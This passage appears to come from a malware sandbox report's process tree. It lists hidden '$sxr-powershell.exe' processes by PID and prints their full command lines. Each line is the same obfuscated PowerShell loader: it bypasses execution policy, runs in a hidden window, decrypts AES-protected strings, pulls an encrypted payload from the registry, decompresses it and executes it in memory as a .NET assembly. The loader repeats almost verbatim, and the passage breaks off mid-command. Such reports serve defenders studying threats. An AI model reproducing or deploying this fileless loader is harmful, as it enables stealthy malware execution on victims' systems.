'')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        Hide Artifacts: Hidden Window
        
        PID:8708
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8708).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        Hide Artifacts: Hidden Window
        
        PID:3824
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8708).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:9284
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8708).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:7056
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8708).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = 